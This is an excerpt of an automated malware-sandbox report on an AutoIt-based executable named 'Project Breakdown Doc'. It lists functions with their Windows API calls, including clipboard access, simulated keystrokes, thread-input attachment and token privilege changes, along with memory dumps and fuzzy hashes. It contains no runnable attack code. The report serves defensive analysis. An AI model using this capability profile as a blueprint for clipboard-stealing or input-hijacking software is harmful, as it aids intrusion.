                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                  • String ID:
                                                  • API String ID: 1396898556-0
                                                  • Opcode ID: 45de58af25240488fe8b2116cb34f5109ec7ea91a207cf00e2b3525e1c849a02
                                                  • Instruction ID: d8f56b5b648e3392ea007fe09bc489ee119e8b79d07c30ced1565ae258f6f6bb
                                                  • Opcode Fuzzy Hash: 45de58af25240488fe8b2116cb34f5109ec7ea91a207cf00e2b3525e1c849a02
                                                  • Instruction Fuzzy Hash: 3011A731600605ABDB28AFB4DC52FAE77A5AF44711F20842DF942A61C1DE719A15A760
                                                  Function 00C801AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: a1eb505e7f72c10d152929e71339eb874656265f9a3cd25907590fc8e44e04b0
                                                  • Instruction ID: 4fa906f0baf2373e1bf834525c858be66970e0c6729e6e81291b415bb4b0a43e
                                                  • Opcode Fuzzy Hash: a1eb505e7f72c10d152929e71339eb874656265f9a3cd25907590fc8e44e04b0
                                                  • Instruction Fuzzy Hash: 46210FB4508341DFCB24DF14C484B1ABBE1BF88304F09896CE8AA47761D731E859DB92
                                                  Function 00C64A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __lock_file.LIBCMT ref: 00C64AD6
                                                    • Part of subcall function 00C68D68: __getptd_noexit.LIBCMT ref: 00C68D68
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __getptd_noexit__lock_file
                                                  • String ID:
                                                  • API String ID: 2597487223-0
                                                  • Opcode ID: 434ea9daee5004ff4aeb54f9304a7290c5fc445cf1442778e9baff1e28651bbf
                                                  • Instruction ID: d790f05f151b70e7356ffad1951a4c1429c03f929887f4ab01d71ce1dca9e00f
                                                  • Opcode Fuzzy Hash: 434ea9daee5004ff4aeb54f9304a7290c5fc445cf1442778e9baff1e28651bbf
                                                  • Instruction Fuzzy Hash: 32F0C231980209ABDF75AFB4CC863AF36A1AF00725F088614F424AA1D2CB788A50FF55
                                                  Function 00C44FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,?,00D062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C44FDE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: f173a167273ec7ba25498b43962dacf4b69cb7326d81ab5364a6bb64af4be698
                                                  • Instruction ID: c89d53301dabdd4cae045deabc2fc7c1c590f601e88ec4d6cc197764af7eff70
                                                  • Opcode Fuzzy Hash: f173a167273ec7ba25498b43962dacf4b69cb7326d81ab5364a6bb64af4be698
                                                  • Instruction Fuzzy Hash: 14F06DB1105712CFEB389FA5E494A16BBF1BF043293348A3EE5E782610C731A948DF40
                                                  Function 00C609D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C609F4
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: LongNamePath_memmove
                                                  • String ID:
                                                  • API String ID: 2514874351-0
                                                  • Opcode ID: e0f3be73229a3528bb38c6e3f2e6e31e5ff03c1df1d8ef2ffb97b1612fcd1c62
                                                  • Instruction ID: 6850cdc0bd06bc2699a272fcb59a522e22b0308149625d5dd93af12d853f991c
                                                  • Opcode Fuzzy Hash: e0f3be73229a3528bb38c6e3f2e6e31e5ff03c1df1d8ef2ffb97b1612fcd1c62
                                                  • Instruction Fuzzy Hash: 5EE0CD76D0422857C720D65CDC05FFA77EDDF88790F0441B5FC0CD7204D9609C828690
                                                  Function 00C6548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __wfsopen
                                                  • String ID:
                                                  • API String ID: 197181222-0
                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                  • Instruction ID: adf0fd326d71ee230ce21de719c43965038113bbece0ba60849ddfd4c5b29df2
                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                  • Instruction Fuzzy Hash: 8CB0927A84020C77DE112E82EC02A693B199B40678F808060FB0C28162AA73A6A0A689
                                                  Function 00C60E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction ID: c91437eb83454f41d79057c7b906a8c09559993e6ef34e74a02ab68947f529f7
                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction Fuzzy Hash: 3A31D370A00115DBC728DF99C4C096AF7A6FF59300B748AA5E45AEB651D732EEC1CB80
                                                  Function 017822A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 017822B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1780000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                  • Instruction ID: de1e38727b0a5f4d3fcf6cf7b4c5300b70827099860c03128faa797115220065
                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                  • Instruction Fuzzy Hash: F9E0E67498410EDFDB00EFB4D54969E7FB4EF04312F100161FD01D2281D6309D50CA72

                                                  Non-executed Functions

                                                  Function 00CCCDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00CCCE50
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CCCE91
                                                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00CCCED6
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CCCF00
                                                  • SendMessageW.USER32 ref: 00CCCF29
                                                  • _wcsncpy.LIBCMT ref: 00CCCFA1
                                                  • GetKeyState.USER32(00000011), ref: 00CCCFC2
                                                  • GetKeyState.USER32(00000009), ref: 00CCCFCF
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CCCFE5
                                                  • GetKeyState.USER32(00000010), ref: 00CCCFEF
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CCD018
                                                  • SendMessageW.USER32 ref: 00CCD03F
                                                  • SendMessageW.USER32(?,00001030,?,00CCB602), ref: 00CCD145
                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00CCD15B
                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00CCD16E
                                                  • SetCapture.USER32(?), ref: 00CCD177
                                                  • ClientToScreen.USER32(?,?), ref: 00CCD1DC
                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00CCD1E9
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CCD203
                                                  • ReleaseCapture.USER32 ref: 00CCD20E
                                                  • GetCursorPos.USER32(?), ref: 00CCD248
                                                  • ScreenToClient.USER32(?,?), ref: 00CCD255
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CCD2B1
                                                  • SendMessageW.USER32 ref: 00CCD2DF
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CCD31C
                                                  • SendMessageW.USER32 ref: 00CCD34B
                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00CCD36C
                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00CCD37B
                                                  • GetCursorPos.USER32(?), ref: 00CCD39B
                                                  • ScreenToClient.USER32(?,?), ref: 00CCD3A8
                                                  • GetParent.USER32(?), ref: 00CCD3C8
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CCD431
                                                  • SendMessageW.USER32 ref: 00CCD462
                                                  • ClientToScreen.USER32(?,?), ref: 00CCD4C0
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CCD4F0
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CCD51A
                                                  • SendMessageW.USER32 ref: 00CCD53D
                                                  • ClientToScreen.USER32(?,?), ref: 00CCD58F
                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00CCD5C3
                                                    • Part of subcall function 00C425DB: GetWindowLongW.USER32(?,000000EB), ref: 00C425EC
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00CCD65F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                  • String ID: @GUI_DRAGID$F
                                                  • API String ID: 3977979337-4164748364
                                                  • Opcode ID: 4452e55a8b685f6b8da864ff930c344d93f1ef39176dc4d0e8b3438b7e5ea24e
                                                  • Instruction ID: 43c777007f32de7aa7dae4bd82729b12ca2440aabbdaba798ec864a84f0cb3ca
                                                  • Opcode Fuzzy Hash: 4452e55a8b685f6b8da864ff930c344d93f1ef39176dc4d0e8b3438b7e5ea24e
                                                  • Instruction Fuzzy Hash: 80427870204341AFD725CF68C884FAABBE6FF49314F14452DF6AA876A0C731E951DB92
                                                  Function 00CC804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00CC873F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: %d/%02d/%02d
                                                  • API String ID: 3850602802-328681919
                                                  • Opcode ID: 49b66c8c88dd574c8dd75046f1f8c13b0d0af16d0c3f0ec614dad466a1a7261b
                                                  • Instruction ID: 401f9685f488ab395868f3d0d516244b3c0811136bda3aa118d2a7217d74e8b6
                                                  • Opcode Fuzzy Hash: 49b66c8c88dd574c8dd75046f1f8c13b0d0af16d0c3f0ec614dad466a1a7261b
                                                  • Instruction Fuzzy Hash: B612C171500248ABEB258F25CC89FAF7BB9EF85710F24412DF915EA2E1EF749A45CB10
                                                  Function 00C5710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memmove$_memset
                                                  • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                  • API String ID: 1357608183-1798697756
                                                  • Opcode ID: c445389cd416a41991edf3c4269e1ea446f3deca373e5f9cb1dcb08dadc56cf5
                                                  • Instruction ID: 65ce40f03f2cc99157ba4b6f2b1d3e782bc24fe85a9997f3a01069f53659466d
                                                  • Opcode Fuzzy Hash: c445389cd416a41991edf3c4269e1ea446f3deca373e5f9cb1dcb08dadc56cf5
                                                  • Instruction Fuzzy Hash: D193A075A00219DBDF24CF98D885BADB7B1FF48310F25816AE955EB280E7709EC2CB44
                                                  Function 00C44A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32(00000000,?), ref: 00C44A3D
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C7DA8E
                                                  • IsIconic.USER32(?), ref: 00C7DA97
                                                  • ShowWindow.USER32(?,00000009), ref: 00C7DAA4
                                                  • SetForegroundWindow.USER32(?), ref: 00C7DAAE
                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C7DAC4
                                                  • GetCurrentThreadId.KERNEL32 ref: 00C7DACB
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C7DAD7
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C7DAE8
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C7DAF0
                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 00C7DAF8
                                                  • SetForegroundWindow.USER32(?), ref: 00C7DAFB
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C7DB10
                                                  • keybd_event.USER32(00000012,00000000), ref: 00C7DB1B
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C7DB25
                                                  • keybd_event.USER32(00000012,00000000), ref: 00C7DB2A
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C7DB33
                                                  • keybd_event.USER32(00000012,00000000), ref: 00C7DB38
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C7DB42
                                                  • keybd_event.USER32(00000012,00000000), ref: 00C7DB47
                                                  • SetForegroundWindow.USER32(?), ref: 00C7DB4A
                                                  • AttachThreadInput.USER32(?,?,00000000), ref: 00C7DB71
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 4125248594-2988720461
                                                  • Opcode ID: f5303452e3bcba0fe8ed0d2b5867bb0e9c88f7416272d6dd6c87adc189032a8a
                                                  • Instruction ID: 06820b8353d8778c0f1a70ee57addcba1e46b775d0710a83b34b26642c433d55
                                                  • Opcode Fuzzy Hash: f5303452e3bcba0fe8ed0d2b5867bb0e9c88f7416272d6dd6c87adc189032a8a
                                                  • Instruction Fuzzy Hash: 9A315271A40318BBEB216F62DC49F7E7E7DEF44B60F114069FA05EA1D0C6B05951ABA0
                                                  Function 00C98858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C98CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C98D0D
                                                    • Part of subcall function 00C98CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C98D3A
                                                    • Part of subcall function 00C98CC3: GetLastError.KERNEL32 ref: 00C98D47
                                                  • _memset.LIBCMT ref: 00C9889B
                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C988ED
                                                  • CloseHandle.KERNEL32(?), ref: 00C988FE
                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C98915
                                                  • GetProcessWindowStation.USER32 ref: 00C9892E
                                                  • SetProcessWindowStation.USER32(00000000), ref: 00C98938
                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C98952
                                                    • Part of subcall function 00C98713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C98851), ref: 00C98728
                                                    • Part of subcall function 00C98713: CloseHandle.KERNEL32(?,?,00C98851), ref: 00C9873A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                  • String ID: $default$winsta0
                                                  • API String ID: 2063423040-1027155976
                                                  • Opcode ID: aad23a2b89bb7914240e417787f72da620036d374220e8a64dd6e00cc2d7b165
                                                  • Instruction ID: 435864861cd2cc139e3cfd78a2f1535a24b49224a7d77deeb38864908255a7a2
                                                  • Opcode Fuzzy Hash: aad23a2b89bb7914240e417787f72da620036d374220e8a64dd6e00cc2d7b165
                                                  • Instruction Fuzzy Hash: 36813B71900249AFDF11DFA4DC49AEE7BB9EF05314F18416AF920A7161DF318E19EB60
                                                  Function 00CB425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenClipboard.USER32(00CCF910), ref: 00CB4284
                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00CB4292
                                                  • GetClipboardData.USER32(0000000D), ref: 00CB429A
                                                  • CloseClipboard.USER32 ref: 00CB42A6
                                                  • GlobalLock.KERNEL32(00000000), ref: 00CB42C2
                                                  • CloseClipboard.USER32 ref: 00CB42CC
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00CB42E1
                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00CB42EE
                                                  • GetClipboardData.USER32(00000001), ref: 00CB42F6
                                                  • GlobalLock.KERNEL32(00000000), ref: 00CB4303
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00CB4337
                                                  • CloseClipboard.USER32 ref: 00CB4447
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                  • String ID:
                                                  • API String ID: 3222323430-0
                                                  • Opcode ID: 4f5f8b9b8acec0faa685f03542a50cdf8eee5b333a60e8eb02f8900e1d124f8f
                                                  • Instruction ID: 4cce39f96d8120ef28a60cf96da80135abbaf24cd7d7fb2852af60b67e7a6255
                                                  • Opcode Fuzzy Hash: 4f5f8b9b8acec0faa685f03542a50cdf8eee5b333a60e8eb02f8900e1d124f8f
                                                  • Instruction Fuzzy Hash: 7651A031208301ABD715EF64DC86FAF77A9AF84B00F00452DF596D21E2DF70DA06AB62
                                                  Function 00CAC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00CAC9F8
                                                  • FindClose.KERNEL32(00000000), ref: 00CACA4C
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CACA71
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CACA88
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CACAAF
                                                  • __swprintf.LIBCMT ref: 00CACAFB
                                                  • __swprintf.LIBCMT ref: 00CACB3E
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                  • __swprintf.LIBCMT ref: 00CACB92
                                                    • Part of subcall function 00C638D8: __woutput_l.LIBCMT ref: 00C63931
                                                  • __swprintf.LIBCMT ref: 00CACBE0
                                                    • Part of subcall function 00C638D8: __flsbuf.LIBCMT ref: 00C63953
                                                    • Part of subcall function 00C638D8: __flsbuf.LIBCMT ref: 00C6396B
                                                  • __swprintf.LIBCMT ref: 00CACC2F
